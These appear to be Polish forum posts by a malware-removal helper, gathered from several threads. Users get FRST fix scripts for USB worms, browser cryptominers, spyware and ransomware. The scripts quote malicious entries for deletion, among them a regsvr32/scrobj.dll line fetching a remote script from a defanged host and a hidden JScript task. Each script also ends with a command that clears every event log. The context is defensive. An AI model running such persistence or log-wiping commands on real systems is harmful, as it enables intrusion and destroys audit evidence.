Miszel03

Tak, system wygląda na wolny od złośliwego oprogramowania.

 

Czy możemy przejść do finalizacji tematu?

Nie ma za bardzo co odkrywać na tym pendrive. Jeśli chodzi o te pliki / lokalizacje:
 

2018-04-03 12:14 - 2018-04-02 23:37 - 000302989 ____A [ED1D83917FC0D34CF27879BC506E2A60] () E:\ \Do wydruku\form_ods_nowy.pdf 
2018-04-04 11:23 - 2018-04-04 10:48 - 000090678 ____A [7B7222E95B9E0879D4625C6BF80AB12A] () E:\do wydruku\17964780237.pdf
2018-04-03 12:15 - 2018-04-03 12:15 - 000000000 ____D [00000000000000000000000000000000] () E:\do wydruku

 
to powinieneś je widzieć. Przekopiuj teraz bezpiecznie na pulpit folder E:\do wydruku i E:\ \Do wydruku\form_ods_nowy.pdf i sformatuj pendrive (wymazania całej zawartości). Jeśli będę dodatkowe pytania / wątpliwości - zadaj je w pierwszej kolejności.
 
Te drobne detekcje adware (skan Malwarebytes) w przeglądarce Mozilla FireFox możesz zadać do kasacji (czyli wykonaj ponownie skan i zaznacz akcje Usuń). 
Reszta wygląda już w porządku, wszystko zostało pomyślnie wykonane.

Hej, mam problem z uruchomieniem gry Arma 3, wyskakuje mi o to taki błąd : https://imgur.com/a/Bup2t Od wczoraj gra dobrze działała od czasu zawieszenia się.

 

Sugeruję przeinstalować tą grę i sprawdzić efekty. Z tego co widzę na forum pomocy technicznej Steam brak swoistego rozwiązania dla tego problemu.

 

Dodałem Logi 

 

To nie wygląda na problem infekcji, więc temat przenoszę do działu Software.

 

Do wykonania drobne zabiegi w tym m.in: kasacja martwych wpisów / podejrzanego zadania w Harmonogramie zadań / czyszczenie lokalizacji tymczasowych (w tym kosza).

 

1. Przez Panel Sterownia sugeruję odinstalować lewy aktywator pakietu Office: KMSpico. Opis: KLIK. 

 

2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść:

 

CloseProcesses:
CreateRestorePoint:
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Brak pliku
ContextMenuHandlers1: [WinRAR] -> [CC]{B41DB860-64E4-11D2-9906-E49FADC173CA} =>  -> Brak pliku
ContextMenuHandlers1: [WinRAR32] -> [CC]{B41DB860-8EE4-11D2-9906-E49FADC173CA} =>  -> Brak pliku
ContextMenuHandlers6: [WinRAR] -> [CC]{B41DB860-64E4-11D2-9906-E49FADC173CA} =>  -> Brak pliku
ContextMenuHandlers6: [WinRAR32] -> [CC]{B41DB860-8EE4-11D2-9906-E49FADC173CA} =>  -> Brak pliku
Task: {9FD5A587-AA82-4CA7-AE3A-88BE4BBC1216} - System32\Tasks\Optimize Thumbnail Cache Files => wscript.exe //nologo //E:jscript //B "C:\ProgramData\InstallShield\Update\isuspm.ini" 
HKU\S-1-5-21-877183501-1986155994-4149436259-1001\...\MountPoints2: {3b51431f-9b05-11e7-9c93-1c1b0d985ab2} - "E:\HiSuiteDownLoader.exe" 
HKU\S-1-5-21-877183501-1986155994-4149436259-1001\...\MountPoints2: {c1f54f6f-9af0-11e7-9c8d-806e6f6e6963} - "D:\Run.exe"
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe 
HKU\S-1-5-18\...\Run: [] => [X]
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
EmptyTemp:

 

 

Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę w tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw go.

 

3. Kontrolnie przeskanuj całościowo system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport.

Pewnie źle zrobiłem, ale pozwoliłem Avirze działać od razu. Więc pliku już nie ma. natomiast miejsce było to samo co wcześniej - cache2/entries.

 

W raportach brak oznak infekcji. 

Nie zrobiłeś źle blokując zagrożenie. Ważne, że ścieżka znowu ta sama.

 

Widocznie NoCoin nie blokuję pewnej strony, która ładuję koparkę. Spróbuj również blokady / kontroli wykonywania skryptów JS za pomocą rozszerzenia NoScript Security Suite.

Posty dot. prośby o raporty stąd kasuję, gdyż te zostały poprawnie dostarczone.
 

Ps. zrobiłem jeszcze jedna rzecz, ściągnąłem usbfix i kliknąłem deletion, zrestartowało system, otwieram teraz pendrive ale jest folder bez nazwy i nic tam nie ma.

 
Infekcja utworzyła folder symulujący jakoby nie miały nazwy i to jedyne co aktualnie pokazuje na tym dysku log USBFix:

[13/03/2018 -13:01:08 | D ] E:\ 
[03/04/2018 - 00:01:36 | RASHD ] E:\Autorun.inf (to szczepionka od USBFix)

Ten szkodnik przenosi do tego folderu poprawne dane z pendrive (on powinien być ukryty, ale pewnie USBFix zdjął atrybuty).

Twoje pliki w tym folderze mogą się znajdować, tylko Ty ich po prostu nie widzisz - są ukryte pod atrybutem HS. Prześwietlę ten folder w skrypcie i zobaczę czy coś tam jest. Jeżeli będą tam dane to ściągnę atrybuty i powinieneś je zobaczyć.
Jeśli jednak danych nie będzie, nic więcej nie da się zrobić.
 

Jedna tylko prośba to aby nie ruszać moozilli bo mam tam ważne dane.

 
Komentarz w spoilerze.

 
 

---

 
W systemie aktywna infekcja uruchamiana przez autostart (ale nie jestem w stanie określić konkretnej nazwy). Oprócz tego zajmuję się kasacją martwych wpisów / skrótów / resztek po oprogramowaniu (m.in po produktach Google).
 
Przeprowadź następujące działania (omawiany pendrive musi być podpięty do portu USB w czasie wykonywania skryptu): 

1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść:

CloseProcesses:
CreateRestorePoint:
C:\Users\KOREK\Desktop\Dokumenty\Gry\Hearthstone.lnk
C:\Users\KOREK\Desktop\Dokumenty\Gry\ipla.lnk
C:\Users\KOREK\Desktop\Dokumenty\Gry\iTunes.lnk
C:\Users\KOREK\Desktop\Dokumenty\Gry\Origin.lnk
C:\Users\KOREK\Desktop\Dokumenty\Gry\RollerCoaster Tycoon 3.lnk
C:\Users\KOREK\Desktop\Dokumenty\Gry\µTorrent.lnk
C:\Users\KOREK\Desktop\bb\PZŁS\ \Do Tibii\to\Elf\Skrót do loader.lnk
C:\Users\KOREK\Desktop\bb\PZŁS\ \Do Tibii\Elfik\Skrót do loader.lnk
C:\Users\KOREK\Desktop\bb\PZŁS\ \Do Tibii\Elf\Skrót do loader.lnk
HKLM-x32\...\RunOnce: [] => [X]
HKLM\...\Policies\Explorer: [TaskbarNoNotification] 0
HKLM\...\Policies\Explorer: [HideSCAHealth] 0
HKU\S-1-5-21-3533474029-2419083652-3193758770-1000\...\Policies\Explorer: [TaskbarNoNotification] 0
HKU\S-1-5-21-3533474029-2419083652-3193758770-1000\...\Policies\Explorer: [HideSCAHealth] 0
HKU\S-1-5-21-3533474029-2419083652-3193758770-1000\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server2.aserdefa.ru/restore.xml scrobj.dll HKU\S-1-5-21-3533474029-2419083652-3193758770-1000\...\MountPoints2: {b41bcb9f-634f-11e7-a5ad-c018850ed8ce} - E:\AutoRun.exe
GroupPolicy: Ograniczenia FF Plugin: @microsoft.com/GENUINE -> disabled [brak pliku]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [brak pliku]
C:\Program Files (x86)\Google
C:\Users\KOREK\AppData\Local\Google
DeleteKey: HKCU\Software\Google
DeleteKey: HKLM\SOFTWARE\Google
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google
VirusTotal: C:\Windows\System32\scrobj.dll
Folder: E:\
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
EmptyTemp:

 
Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę w tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 

2. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 

3. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Sytuacja ta powtarza się nawet po formacie i ponownej instalacji Windows 7.

Prasuję się tutaj na pierwszy rzut oka problem sprzętowy urządzenia wejściowego - myszy.

 

Czy masz możliwość sprawdzenia jak zachowywać się będzie inna mysz podłączona do tego komputera? Sprawdź również inny port USB.

Od czasu wdrożenia zaproponowanych działań Avira wykryła jeden plik CryptoMiner (2 dni po ostatnim wpisie, przy ręcznym skanowaniu, nie było alertu systemowego).

 

Proszę o ścieżkę pliku, którego dotyczyła ta detekcja.

 

Dodatkowo dostarcz nowy komplet raportów FRST.

Z tego komunikatu nie wiele wynika, padłeś ofiarą infekcji szyfrującej dane i żądającej za nie okupu. 

 

W celu identyfikacji wariantu infekcji szyfrującej (pozwoli ocenić czy istnieje dekoder) proszę przesłać zaszyfrowany plik do analizy w usłudze ID Ransomware. Wynik dostarcz w postaci zrzutu ekranu / zdjęcia. 

Uzupełnij też wymagana raporty systemowe. 

Przypominam o zmianie haseł we wszystkich serwisach logowania. Sugeruję uruchomić również bezpieczną weryfikację dwuetapową na najważniejszych kontach logowania (jeśli możliwe).

Na jakim systemie występuje ten problem?

Podejrzewam, że będzie trzeba wdrożyć FIX adresujący klucz zasadniczy Kosza z jego danymi (opcje menu kontekstowego, pobór ikony oraz nazwa).

 

Wstępnie spróbuj również wykonać reset katalogu kosza na dysku C (zostaną usunięte z niego wszystkie dane). 

 

1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść:

 

CreateRestorePoint:
RemoveDirectory: C:\$Recycle.bin
Reboot:

 

 

Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). System uruchomi się ponownie, po tej operacji przedstaw wynikowy fixlog.txt.

 

2. Napisz też jak wygląda sytuacja z koszem po tym zabiegu?

Zrobiłem skan tymi dwoma programami które podałeś i żaden nic nie wykazał.

 

Wprawdzie nie prosiłem o to, ale dobrze to słyszeć. 

 

Pisząc Podsumuj obecną sytuację chodzi mi o to, abyś napisał jak zachowuję się teraz komputer?

1. Pierwsze wejście to plik, a drugi folder wygląda na to, że jest pusty, upewnij się i skasuj oba: 

• C:\Users\Kratos\AppData\Roaming\OFSWO
• C:\Program Files (x86)\Client

2. Podsumuj obecną sytuację. 

Katalog: C:\Users\Kratos\AppData\Roaming
2017-01-25  15:18   

          Monitor
 
Data utworzenia tego katalogu nakłada się właśnie z datą utworzenia szkodnika, którego wykryłem w raportach. To wygląda na spyware, gdyż w katalogu masa zrzutów ekranu i logów. 
Malwarebytes również potwierdza moje obawy - to definitywnie Trojan.StolenData.D.Generic. Aczkolwiek mam pytanie: czy skan na pewno nie został zatrzymany (widzę, że trwał tylko 49 sekund*)? 
 
Po dezynfekcji wymagana prewencyjna zmiana haseł we wszystkich serwisach logowania i koniecznie w bankach.
 
* jeśli skan nie został zatrzymany przejdź dalej: 
 
Poprawki i przenoszenie do kwarantanny folderu Monitor (Malwarebytes nie wiedzieć czemu przenosi tylko niektóre elementy z tego folderu), oprócz tego sprawdzam kolejne dwa foldery OFSWO i Client, gdyż ich daty nakładają się idealnie z datami wejścia infekcji. 
 
1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść:
 

CHR HKLM\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files\Norton 360\Engine\22.12.1.15\Exts\Chrome.crx 
CHR HKLM-x32\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files\Norton 360\Engine\22.12.1.15\Exts\Chrome.crx 
CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
C:\Users\Kratos\AppData\Roaming\Monitor
Folder: C:\Users\Kratos\AppData\Roaming\OFSWO
Folder: C:\Program Files (x86)\Client
VirusTotal: C:\Users\Kratos\AppData\Roaming\ezpinst.exe

 
Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę w tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw go. 
 
2. Wykonaj kolejny całościowy skan systemu, tym razem za pomocą Zemana AntiMalware Free. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport.

Wspomniany folder zostanie oczywiście sprawdzony, ale oprócz niego widoczna jest inna infekcja, która panoszy się w systemie już od przeszło roku. 
 
Zajmę się również sprzątaniem resztek po oprogramowaniu (m.in po produktach Google). Zostaną również wyczyszczone lokalizacje tymczasowe (w tym kosz). 
 
1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść:

CloseProcesses:
C:\ProgramData\Microsoft\Windows\GameExplorer\{31876D21-6CD3-4CC8-9C31-8ACE51C11C89}\SupportTasks\0\Sieć.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam\Steam.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Eidos Interactive\Tomb Raider GOTY Edition\Deinstalacja programu Tomb Raider GOTY Edition.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Eidos Interactive\Tomb Raider GOTY Edition\Tomb Raider GOTY Edition.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bethesda Softworks\Fallout 4\Deinstalacja programu Fallout 4.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bethesda Softworks\Fallout 4\Fallout 4.lnk
C:\Users\Kratos\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft\Uplay\Uninstall.lnk
C:\Users\Kratos\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft\Uplay\Uplay.lnk
HKU\S-1-5-21-4166491339-2414778801-2949013589-1000\...\Policies\Explorer: [NoSaveSettings] 0
HKU\S-1-5-21-4166491339-2414778801-2949013589-1000\...\MountPoints2: G - G:\Autorun.exe
HKU\S-1-5-21-4166491339-2414778801-2949013589-1000\...\MountPoints2: {2e163e10-e235-11e6-8fcf-1c6f65d0a118} - G:\autorun.exe
HKU\S-1-5-21-4166491339-2414778801-2949013589-1000\...\MountPoints2: H - H:\setup\rsrc\Autorun.exe
Startup: C:\Users\Kratos\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VIGIOOUbALLd.lnk [2017-01-25]
ShortcutTarget: VIGIOOUbALLd.lnk -> C:\Users\Kratos\oOCJdZ7EJTCFoBjC\BPLH.exe (AutoIt Team)
C:\Users\Kratos\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VIGIOOUbALLd.lnk 
C:\Users\Kratos\oOCJdZ7EJTCFoBjC
C:\Users\Kratos\AppData\Roaming\BPLH.exe
FF Plugin: @microsoft.com/GENUINE -> disabled [brak pliku]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [brak pliku]
U3 DfSdkS; Brak ImagePath
S3 cmudaxp; system32\drivers\cmudaxp.sys [X]
S3 EraserUtilDrv11710; \??\C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilDrv11710.sys [X]
S3 NAVENG; \??\C:\Program Files\Norton 360\NortonData\22.9.1.12\Definitions\SDSDefs\20171202.001\NAVENG.SYS [X]
S3 NAVEX15; \??\C:\Program Files\Norton 360\NortonData\22.9.1.12\Definitions\SDSDefs\20171202.001\NAVEX15.SYS [X]
C:\Program Files (x86)\Google
C:\Users\Kratos\AppData\Local\Google
DeleteKey: HKCU\Software\Google
DeleteKey: HKLM\SOFTWARE\Google
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google
Folder: C:\Users\Kratos\AppData\Roaming\monitor
CMD: dir /a "C:\Program Files"
CMD: dir /a "C:\Program Files (x86)"
CMD: dir /a "C:\Program Files\Common Files\System"
CMD: dir /a "C:\Program Files (x86)\Common Files\System"
CMD: dir /a C:\ProgramData
CMD: dir /a C:\Users\Kratos\AppData\Local
CMD: dir /a C:\Users\Kratos\AppData\LocalLow
CMD: dir /a C:\Users\Kratos\AppData\Roaming
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
EmptyTemp:

 

 
Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 
 
2. Użyj zainstalowanego Malwarebytes Anti-Malware i po aktualizacji wykonaj nim całościowy skan systemu. Jeśli coś zostanie wykryte to niczego nie usuwaj, a dostarcz raport. 
 
3. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Nie mogę otworzyć tego załącznika. Poza tym w instrukcji napisane jest jasno, że wymagane są trzy pliki - FRST, Addition i Shortcut.

 

Proszę o dostarcznie wszystkich trzech, jeśli jest problem z załącznikami to proszę skorzystać z serwisu wklej.org.

Dobrych Świąt wszystkim!

GandCrab Ransomware Help & Support Topic (.GDCB & GDCB-DECRYPT.txt)

 

Pojawił się dekoder dla wersji 1. Sugeruję wypróbować go.

W każdym razie mógłby ktoś na to zerknąć, czy muszę się bawić mając już gotowy log?

 

Proszę dostarczyć wymagane przez nas raporty. ComboFix nie jest podstawą diagnostyczną. 

 

Same wykonanie skanu nie jest z tego co wiem niebezpieczne.

• ComboFix to nie jest narzędzie do "tworzenia loga" (skan jest inwazyjny), tylko bardzo ingerencyjny program, który zgodnie z przyrostkiem w nazwie robi potężny "FIX" oraz modyfikuje system. 
• Do tworzenia logów mamy w rękawie kilka narzędzi nie modyfikujących wcale systemu a produkujących "zestaw podobny do ComboFix".

Więc jeśli pod sformułowaniem "zaktualizuj oprogramowanie zewnętrzne" kryje się coś konkretnego to proszę o wyjaśnienie.

Chodzi o programy z sekcji aktualizacji istotnych aplikacji w podlinkowanym wyżej temacie. 

 

Tak samo jeśli chodzi o Windows.

 

Skoro Windows Update nie wyszukuje nowych aktualizacji to jest OK.

Dostosuj temat do zasad działu. 

 

Proszę poczytaj również na temat używania ComboFix - to narzędzie czerwonego alertu, przeznaczone tylko dla osób przeszkolonych do jego używania. Użytkownik samodzielnie nie może go używać.

Cieszę się, że mogłem pomóc.

 

Ale prosiłbym o nie zamykanie wątku jeszcze przez kilka, bo jak przy buszowaniu po internecie wejdę na jakąś podejrzaną stronę to bez sensu będzie otwierać nowy temat.

 

W porządku.

Na koniec zastosuj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne jak i system Windows.

Czy problem z detekcją CoinMiner nadal występuję?

Malwarebytes możesz już odinstalować.

Wyczyściłem ponownie pamięć podręczną i zainstalowałem NoCoin. Czy w nim coś trzeba ustawiać czy wystarczyło tylko zainstalować?

 

Zainstalowane rozszerzenie jest gotowe do użycia. Sekcja konfiguracyjna dostępna jest w panelu Rozszerzeń (CTRL + SHIFT + A) przy przycisku Opcje. 

 

Czy Malwarebytes AntiMalware można odpalić z poziomu przeglądarki czy trzeba instalować, bo pamiętam, że kiedyś go używałem, ale po którejś aktualizacji już nie potrafiłem go okiełznać (zaczął mi sam kasować potrzebne pilki i blokować przyjazne strony).

 

Wymagana jest instalacja. Malwarebytes to rekomendowane narzędzie, ale jest bardzo wrażliwe na detekcje typu adware / PUP - pewnie stąd komunikaty bezpieczeństwa na względnie bezpiecznych stronach. 

 

Proszę po prostu przy instalacji nie uruchamiać ochrony w czasie rzeczywistym, a wykonać tylko pełne skanowanie i dostarczyć wyniki do analizy (nie podejmować żadnych akcji). Po tych akcjach i tak wspomnę kiedy będzie można odinstalować tą aplikację.

Raporty nie wykazują oznak infekcji. 

 

Natomiast druga rzecz, w zasadzie główna to CryptoMiner. Nazwy pliku nie podam, bo za każdym razem jest inna (jest to ciąg liter i liczb) zlokalizowany zawsze w katalogu cache2/entries w Firefoxie. Po wyczyszczeniu ciasteczek i pamięci podręcznej znika, po usunięciu przez Avirę znika, ale po krótkim czasie znów się pojawia.

 

Podobny temat: Infekcja JS/CoinMiner.B. 

 

Prawdopodobnie w Twoim przypadku jest podobnie. Po wejściu na stronę ze zintegrowaną koparką kryptowalut JavaScript zostaje wykonany i rozpoczyna się proces wydobycia.

 

Czy jesteś w stanie odtworzyć, przy której konkretnie stronie zostaje wyświetlona detekcja? Twoje rozszerzenie blokujące reklamy uBlock Origin z tego co widzę nie posiada wbudowanego filtra wykrywającego skrypty koparek.

Sugeruję więc wyposażyć się dodatkowo w rozszerzenie NoCoin. Przedtem oczywiście ponownie wyczyść ciasteczka i pamięć podręczną przeglądarki. Pozostaje obserwować czy problem ustąpił.

 

---

 

Poniżej zadaję sprzątanie resztek po oprogramowaniu (m.in po produktach Google). Zostaną również wyczyszczone lokalizacje tymczasowe (w tym kosz). 

 

1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść:

 

CloseProcesses:
CreateRestorePoint: 
C:\ProgramData\APRP\ASUSProductReg.url 
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
R4 IOMap; \??\C:\Windows\system32\drivers\IOMap64.sys [X]
S4 nvvad_WaveExtensible; system32\drivers\nvvad64v.sys [X]
C:\Program Files (x86)\Google
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
C:\Users\Artur Machnicki\AppData\Local\Google
DeleteKey: HKCU\Software\Google
DeleteKey: HKLM\SOFTWARE\Google
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
EmptyTemp:

 

 

Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw go. 

 

2. Dla świętego spokoju sugeruję również przeskanować system za pomocą skaner na żądanie np. Malwarebytes AntiMalware.